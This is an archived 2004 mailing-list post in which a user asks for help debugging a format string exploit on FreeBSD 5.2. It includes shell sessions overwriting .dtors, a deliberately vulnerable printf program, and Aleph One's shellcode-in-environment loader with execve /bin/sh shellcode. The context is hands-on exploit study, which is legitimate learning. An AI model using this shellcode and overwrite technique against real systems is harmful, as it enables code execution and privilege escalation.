Vulnerability Development mailing list archives

Problem with format string exploit dev in FreeBSD 5.2-CURRENT

From: Ganbold <ganbold () micom mng net>
Date: Thu, 29 Jul 2004 17:02:50 +0900

Hi all,

I have sample format string exploit problem in FreeBSD 5.2-CURRENT.

$uname -an

FreeBSD localhost 5.2-CURRENT FreeBSD 5.2-CURRENT #8: Wed Mar 3 11:09:58ULAT 2004 tsgan@localhost:/usr/obj/usr/src/sys/MX i386

I'm using http://www.groar.org/expl/howto/fmtbuilder.txt to build theformat string.


I can get the offset:
---------------------------------------------------------------------------------------------------------
bash-2.05b$ ./fmt_vuln "AAAA %x %x %x %x %x %x"
The right way:
AAAA %x %x %x %x %x %x
The wrong way:
AAAA bfbfdfb8 0 0 0 0 41414141
[*] test_val @ 0x0804977c = -72 0xffffffb8
---------------------------------------------------------------------------------------------------------

Then I'm getting DTORs address:

---------------------------------------------------------------------------------------------------------
bash-2.05b$ objdump -s -j .dtors fmt_vuln

fmt_vuln:     file format elf32-i386-freebsd

Contents of section .dtors:
 8049824 ffffffff 00000000                    ........

bash-2.05b$ nm ./fmt_vuln|grep DTOR
08049828 d __DTOR_END__
08049824 d __DTOR_LIST__
---------------------------------------------------------------------------------------------------------

Afterwards I'm storing shellcode in env using AlephOne's exploit code (Seebelow).


---------------------------------------------------------------------------------------------------------
$ ./getsx1 200
Using address: 0xbfbfec78
bash-2.05b$

bash-2.05b$ ./getenvaddr EGG
EGG is located at 0xbfbfe557
---------------------------------------------------------------------------------------------------------

When I run exploit I get:

---------------------------------------------------------------------------------------------------------
bash-2.05b$ ./fmt_vuln `./fmtbuilder -n -a 0x08049828 -r 0xbfbfe557 -o 6 -b 0`
Format string builder version 0.2
(C) 2001 Pappy & Zorgon

[ Building the fmt string ... ]
[ Building completed (52) ]
[ Checking the fmt string ... ]
[ Checking completed (52) ]

[ fmt string ] = %327x%6$n%398x%7$n%218x%8$n%256x%9$n

The right way:
%327x%6$n%398x%7$n%218x%8$n%256x%9$n
The wrong way:
Bus error (core dumped)

bash-2.05b$ ./fmt_vuln `./fmtbuilder -n -a 0x08049824 -r 0xbfbfe557 -o 6 -b 0`
Format string builder version 0.2
(C) 2001 Pappy & Zorgon

[ Building the fmt string ... ]
[ Building completed (52) ]
[ Checking the fmt string ... ]
Found a % at 4.
[ Checking completed (52) ]

[ fmt string ] = %%327x%6$n%398x%7$n%218x%8$n%256x%9$n

The right way:
%%327x%6$n%398x%7$n%218x%8$n%256x%9$n
The wrong way:
Bus error (core dumped)

---------------------------------------------------------------------------------------------------------

So I get Bus error (core dumped) result. But in my opinion I should get shell.
Somehow exploit is not working and I don't know the reason.
I tried many times and no result.
It seems like format string exploit in FreeBSD is different than Linux.

Does anybody have experience developing format string exploit in FreeBSDbefore?

Did somebody solve this kind of problem before?

Can somebody give me some hints, advices and guides?

I googled for this kind of problem, and find only in this list last Junesomeone had problem,

but didn't find the solution.

Can somebody help me in this regard?

thanks in advance,

Ganbold


Followings are vulnerable program, getenvaddr.c, Aleph One exploit:

---------------------------------------------------------------------------------------------------------
Vulnerable program:
---------------------------------------------------------------------------------------------------------
#include <stdlib.h>

int main(int argc, char *argv[])
{
   char text[1024];
   static int test_val = -72;

   if(argc < 2)
   {
      printf("Usage: %s <text to print>\n", argv[0]);
      exit(0);
   }
   strcpy(text, argv[1]);

   printf("The right way:\n");
   printf("%s", text);

   printf("\nThe wrong way:\n");
   printf(text);
   printf("\n");

// Debug output

printf("[*] test_val @ 0x%08x = %d 0x%08x\n", &test_val, test_val,test_val);


   exit(0);
}
---------------------------------------------------------------------------------------------------------


Aleph One's exploit code
---------------------------------------------------------------------------------------------------------
#include <stdlib.h>

#define DEFAULT_OFFSET                    0
#define DEFAULT_BUFFER_SIZE             512
#define DEFAULT_EGG_SIZE               2048
#define NOP                            0x90

char shellcode[] =
    "\x31\xc0"               /* xorl    %eax, %eax  */
    "\x50"                   /* pushl   %eax        */
    "\x68\x2f\x2f\x73\x68"   /* pushl   $0x68732f2f */
    "\x68\x2f\x62\x69\x6e"   /* pushl   $0x6e69622f */
    "\x89\xe3"               /* movl    %esp, %ebx  */
    "\x50"                   /* pushl   %eax        */
    "\x53"                   /* pushl   %ebx        */
    "\x89\xe2"               /* movl    %esp, %edx  */
    "\x50"                   /* pushl   %eax        */
    "\x52"                   /* pushl   %edx        */
    "\x53"                   /* pushl   %ebx        */
    "\x50"                   /* pushl   %eax        */
    "\xb0\x3b"               /* movb    $0x3b, %al  */
    "\xcd\x80"               /* int     $0x80       */
    "\x31\xc0"               /* xorl    %eax, %eax  */
    "\x40"                   /* inc     %eax        */
    "\x50"                   /* pushl   %eax        */
    "\x50"                   /* pushl   %eax        */
    "\xcd\x80";              /* int     $0x80       */


unsigned long get_esp(void) {
   __asm__("movl %esp,%eax");
}

void main(int argc, char *argv[]) {
  char *buff, *ptr, *egg;
  long *addr_ptr, addr;
  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
  int i, eggsize=DEFAULT_EGG_SIZE;

  if (argc > 1) bsize   = atoi(argv[1]);
  if (argc > 2) offset  = atoi(argv[2]);
  if (argc > 3) eggsize = atoi(argv[3]);

  if (!(buff = malloc(bsize))) {
    printf("Can't allocate memory.\n");
    exit(0);
  }
  if (!(egg = malloc(eggsize))) {
    printf("Can't allocate memory.\n");
    exit(0);
  }

  addr = get_esp() - offset;
  printf("Using address: 0x%x\n", addr);

  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i+=4)
    *(addr_ptr++) = addr;

  ptr = egg;
  for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
    *(ptr++) = NOP;

  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];

  buff[bsize - 1] = '\0';
  egg[eggsize - 1] = '\0';

  memcpy(egg,"EGG=",4);
  putenv(egg);
  memcpy(buff,"RET=",4);
  putenv(buff);
  system("/usr/local/bin/bash");
}
---------------------------------------------------------------------------------------------------------

getenvaddr.c
---------------------------------------------------------------------------------------------------------
#include <stdlib.h>

int main(int argc, char *argv[])
{
  char *addr;
  if(argc < 2)
  {
    printf("Usage:\n%s <environment variable name>\n", argv[0]);
    exit(0);
  }
  addr = getenv(argv[1]);
  if(addr == NULL)
    printf("The environment variable %s doesn't exist.\n", argv[1]);
  else
    printf("%s is located at %p\n", argv[1], addr);
  return 0;
}

Current thread:

Problem with format string exploit dev in FreeBSD 5.2-CURRENT Ganbold (Jul 30)
- Re: Problem with format string exploit dev in FreeBSD 5.2-CURRENT infamous41md (Jul 31)
- <Possible follow-ups>
- Re: Problem with format string exploit dev in FreeBSD 5.2-CURRENT Vlad902 (Jul 30)